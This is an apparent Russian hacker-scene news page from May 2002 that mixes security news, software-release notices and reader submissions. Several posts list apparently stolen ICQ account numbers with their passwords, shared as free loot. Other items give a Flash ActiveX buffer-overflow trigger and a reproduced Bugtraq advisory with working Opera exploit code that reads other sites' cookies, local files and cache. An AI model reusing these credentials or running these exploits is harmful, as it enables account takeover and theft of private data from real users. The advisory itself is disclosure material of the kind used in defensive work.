16.05.2002 - sent by smash*Inside

ICQ#: 93128570 Password: 12321
ICQ#: 47002572 Password: 12321
ICQ#: 91206123 Password: 12321

16.05.2002 - 2advanced.com - блин, тащусь от таких сайтов... Фантастика...

16.05.2002 - sent by FuckemoN

ICQ#: 61668493 Password: GESHTRAD
ICQ#: 18942258 Password: GESHTRAD

16.05.2002 - "Лаборатория Касперского", российский разработчик систем информационной безопасности, предупредила о массовой рассылке троянской программы "TrojanDownloader.Win32.Smokedown", замаскированной под программу лечения Интернет-червя "Klez". В качестве отправителя письма указан "Kaspersky Labs" и адрес "support@kaspersky.com". В действительности вредоносная программа была разослана анонимным злоумышленником с одного австралийского почтового сервера, а приведенная информация об отправителе была умышленно фальсифицирована.

Вредоносная программа распространяется по электронной почте. Зараженные письма имеют формат HTML и выглядят следующим образом:
Тема: You're under a serious threat!
Текст: Kaspersky Labs urging users to take the necessary measures to protect themselves against the mounting threat from the latest version of the Internet-worm Klez, most users lightly regarded the problem of securing their personal data, resulting in a global Internet virus epidemic. Over the past several days our technical support services have received over twelve thousand inquiries concerning Klez Internet worm infections.
В теле письма также содержится замаскированный Java-скрипт, который незаметно загружает с удаленного сервера троянскую программу "Smokedown" и устанавливает ее на компьютер. Для этого вредоносный код использует брешь в системе безопасности Internet Explorer, которая была обнаружена в конце марта 2001 г. и описана в бюллетене Microsoft. "Заплатка", устраняющая данную брешь доступна для скачивания.

(sent by Biryuk)

16.05.2002 - Вот какой ответ я получил на письмо с вопросом "Почему мазу в яндексе стало не найти?"

Лицом, ответственным за создание или поддержание сайта http://www.mazafaka.ru/ была нарушена "Лицензия на использование поисковой системы Яндекса (Yandex.Ru)" http://www.yandex.ru/info/termsofuse.html#spamer. Сайт запрещен к индексированию за поисковый спам. http://www.yandex.ru/info/webmaster5.html

В соответствии с пунктом 3.5 Лицензии "мы не комментируем удаление сайтов, не предуведомляем о нем, и не даем никаких гарантий и сроков на повторное их включение в индекс."

Возможный срок восстановления ресурса в базе данных может быть рассмотрен, но не ранее, чем через месяц.

Яндекс душит мазафаку... Блин, обидно...

16.05.2002 - Кажется, юзеров - хоть убивай, но пароли они будут выбирать, глядя на рекомендации по их выбору и делая все с точностью до наоборот. Прекрасной иллюстрацией этого тезиса является дефейс сайта www.eshoppers.biz. Автор дефейса вместо пальцатых заставок типа "я вас тут чиста поимел" сделал страничку, содержащую список имен и паролей пользователей сайта. Большая часть паролей не отличается особой оригинальностью: имена (в лучшем случае, написанные наоборот), короткие цифровые последовательности (12345) и т.п. Горбатого могила исправит...

(sent by DJAMIX) Источник:Zone-H

16.05.2002 - sent by SaleICQ.Ru

ICQ#: 58250621 Password: 2910
ICQ#: 57784812 Password: 1968

16.05.2002 - Коннектимся telnet'ом к www.boston.ru (для танкистов - вводим в командной строке telnet www.boston.ru)

(sent by GRAF®)

16.05.2002 - Переполнение буфера существует в ActiveX plugin'е Macromedia. Если к компоненту передан параметр с завышенными размерами, то произойдет его разрушение. Успешная эксплуатация уязвимости может привести к выполнению произвольного кода при просмотре злонамеренной Web страницы. Возможно также эксплуатировать эту уязвимость через почтовое HTML сообщение.

Уязвимость обнаружена в Macromedia Flash 6.0.

Пример:
<OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"><PARAM NAME=movie VALUE= "http://www.notthere8979873.com/notthere.swf?AAA [...unstated, but fixed number]XXXXXXXX"></OBJECT>

16.05.2002 - Общественность уже, видимо, подзабыла инцидент с арестом челябинских хакеров в Штатах. Ребят пригласили якобы на работу ( подставная лавка Invita), предложили продемонстрировать свой уровень и повязали за это. То, что дело обстряпано грязненько, было понятно с самого начала. А вот теперь CBSNews публикует подробности и активно рекламирует банальный кейлоггер, с помощью которого крутые парни из ФБР получили пароли доступа к находящемуся в Челябинске серверу и скопировали с него информацию, предъявленную позже в качестве улик. Только вот самое справедливое в мире американское правосудие упорно не хочет признавать, что доказательства получены, мягко говоря, незаконно.

(sent by DJAMIX) Источник: cbsnews

16.05.2002 - ПОЯВИЛАСЬ ФИНАЛЬНАЯ ВЕРСИЯ WINRAR 3.00

Рано или поздно, но вы всегда приходите к задаче по необходимости сжатия данных. Помочь тут может только архиватор. На просторах всемирной паутины появилась новая версия самого мощного и универсального архиватора WinRAR 3.00 Final. Утилита работает под всеми операционными системами. Скачать WinRAR 3.00 Final можно по этим адресам:

WinRAR 3.00 Final для Windows: http://www.rarlab.com/rar/wrar300.exe
RAR 3.00 Final для Linux: http://www.rarlab.com/rar/rarlinux-3.0.tar.gz
RAR-32 3.00 Final для DOS and OS/2: http://www.rarlab.com/rar/rarx300.exe
RAR-32 для FREE-BSD Unix 3.00 Final: http://www.rarlab.com/rar/rarbsd-3.0.tar.gz.

(sent by DJAMIX)

16.05.2002 - ВЫШЕЛ NETSCAPE 6.2.3

Продолжается разработка и выпуск новых версий программного пакета Netscape. На днях в сеть выложена очередная версия 6.2.3 этого этого продукта. Никаких внешних доработок я не заметил. Возможны, внутренние изменения, так как браузер стал заметно "легче". Скачать программный пакет Netscape 6.2.3 можно по следующим адресам:

Netscape 6.2.3 для Windows: скачать
Netscape 6.2.3 для Linux: скачать
Netscape 6.2.3 для MacOS 8: скачать
Netscape 6.2.3 для MacOS X: скачать

(sent by DJAMIX)

16.05.2002 - ОНЛАЙН-ВОРЫ СОБЕРУТСЯ В ОДЕССЕ

В конце месяца несколько десятков онлайновых торговцев ворованными данными с кредитных карт намереваются собраться в Одессе на конференцию для обсуждения общих проблем своего процветающего бизнеса, - поделилась в понедельник перехваченной информацией New York Times. В обзоре состояния данного черного рынка газета отмечает, что для мировой финансовой системы ежегодные потери от воровства кредиток в Сети составляют уже более $1 миллиарда.

Большинством специализированных торговых площадок скупки-продажи краденных данных управляют граждане стран бывшего Советского Союза, которые стали доминировать в этой криминальной сфере. Свои проблемы участники данного бизнеса обсуждают на закрытых веб-форумах и даже на офлайновых конференциях, как та, что пройдет в Одессе. Стоимость в Сети идентификационных данных с одной кредитки в зависимости от их уровня колеблется от 40 центов до $5. Но обычно ворованные карточки предлагаются оптом, например, за $100 - 250 штук или за $1000 - 5000 карт с гарантией их валидности. Непосредственно воровством занимаются "злые" хакеры или
"черные шляпы" (black-hat), которые занимаются на взломом в корыстных и вредительских целях.

Они также отличаются от хакеров-"белых шляп" (white-hat), как черные и белые маги или злые и добрые волшебники. Исследовательская фирма Celent Communications отмечает, что $1 миллиард потерь с ворованных карт это, конечно, плохо, но данная сумма уже не представляется настолько большой в сравнении с $900-миллиардным ежегодным оборотом транзакций только одной платежной системы Visa. Для конкретных частных фирм потери могут быть куда ощутимей и даже приводить к их банкротству.

(sent by DJAMIX)

16.05.2002 - ПОЯВИЛСЯ WINDOWS 2000 SERVICE PACK 4

Не помню, чтобы Microsoft анонсировала полный Windows 2000 SP3, но на ее сайте уже появилась папка "Windows 2000 Service Pack 4 FTP Folder". Ее содержимое готово пофиксить около 100 ошибок в операционной системе Windows
2000. Папка появилась 8 апреля этого года и продолжает пополняться. Вот ее адрес: ftp://hotfix.microsoft.com/winnt/windows_2000/sp4/.

(sent by DJAMIX)

16.05.2002 - Канадцы вербуют квалифицированных хакеров.

Агенство электронного шпионажа Канады вербует хакеров, чтобы те стали кибер Джеймсами Бондами. Учреждение Защиты Связи (CSE) хочет расширить свою группу шпионов на по крайней мере третью часть, за следующие 18 месяцев из-за большого объема работы. CSE контролирует телефоны, факсы, спутниковый и компьютерный трафик, чтобы найти нарушения, интересные для полиции.

Спрос на хакеров повысился после нападения в сентябре террористов на США. Канадское правительство недавно дало агенству около 280 миллионов долларов, чтобы нанять новый штат сотрудников. Люди из CSE сказали, что эта самая большая вербовка в истории учреждения. Агенство ищет хакеров - консультантов защиты. Также требуются эксперты защиты, которые сделают сайты и сети правительственных учреждений более защищенными.

(sent by kAMIkaDze)

16.05.2002 - Сегодня было сделано очень любопытное открытие, русскими взломщиками, объявившими борьбу с педофилией, некрофилией и другими извращениями в сети. На форуме xxx-взломщиков появился пост со ссылками на взломанный сервер-хостинг для некрофилов на котором буквально в недавнее время, рядом с самыми мерзкими сайтами, которые там хостятся, расположился родной брат сайта kavkaz.org - Вайнах , личный сайт президента Чечни Масхадова, так называемый http://vainakh.org. Остается сделать выводы, откуда сайты подобные www.ogrish.com (сервер приютивший ваххабитов) берут свой контент и каким образом ваххабизм вдруг сдружился с грязной порнографией... Подробная информация и ее развитие тут

(sent by damn)

16.05.2002 - Только что пришло известие из buqtraq'а о дырке в Опере. Короче, перевести уже не успел, но суть понятна.

Title: Opera javascript protocoll vulnerability
Date: [2002-05-15]
Software: At least Opera 6.01, 6.0, 5.12 (win)
Rating: High because Opera is assumed to be secure
Impact: Read cookies/local filestructure/cache
Vendor: Opera has confirmed the vulnerability and released today a new version 6.02 fixing the issue.
http://www.opera.com/
Workaround: Disable javascript.
Author: Andreas Sandblad, sandblad@acc.umu.se

DESCRIPTION:
============
Opera allows the location of a frame to be overwritten by an url containing the javascript protocoll. The javascript code will be operating in the same domain as the url that was overwritten. Thus we can read cookies from other domains, local file structure and private information from the cache (history of links visited).

EXPLOIT I:
==========
The following exploit has been tested to work on Opera 6.01, 6.0 (win). It will not work on 5.x because it requires the iframe feature.

------------------- CUT HERE -----------------------------------
<iframe name=cookie src="http://www.google.com/" height=0 width=0></iframe>
<iframe name=files src="file://c:/" height=0 width=0></iframe>
<iframe name=cache src="opera:cache" height=0 width=0></iframe><br>
<a href="javascript:readCookie()">Read google cookie</a><br>
<a href="javascript:readFiles()">Read c:/ structure (win)</a><br>
<a href="javascript:readCache()">Read links in cache</a><br>
<script>
function readCookie(){
cookie.location="javascript:alert(document.cookie)";
}
function readFiles(){
t = 'javascript:s="";l=document.links;';
t+= 'for(i=0;l.item(i);i++) s+=l.item(i);alert(s);';
files.location = t;
}
function readCache(){
t = 'javascript:s="";l=document.links;';
t+= 'for(i=0;l.item(i);i++) s+=l.item(i);alert(s);';
cache.location = t;
}
</script>
------------------- CUT HERE -----------------------------------

EXPLOIT II:
===========
For versions of Opera not supporting the iframe tag the exploit must be done using the frame tag instead. The following exploit has been tested on Opera 6.01, 6.0, 5.12 (win).

------------------- CUT HERE -----------------------------------
<HTML>
<FRAMESET ROWS="100%,0,0,0">
<FRAME SRC="payload.html">
<FRAME NAME="cache" src="opera:cache" noresize>
<FRAME NAME="files" src="file:///c:/" noresize>
<FRAME NAME="cookie" src="http://www.google.com/" noresize>
</FRAMESET>
</HTML>
------------------- CUT HERE -----------------------------------
payload.html:
------------------- CUT HERE -----------------------------------
<a href="javascript:alert(document.cookie)" target="cookie">Google
cookie</a><br>
<a href="javascript:alert(document.links.item(0))" target="cache">First
item in cache</a><br>
<a href="javascript:alert(document.links.item(1))" target="files">First
file/directory in c:\ (win)</a>
------------------- CUT HERE -----------------------------------

Disclaimer:
===========
Andreas Sandblad is not responsible for the misuse of the information provided in this advisory. The opinions expressed
are my own and not of any company. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this advisory. Any use of the information is at the user's own risk.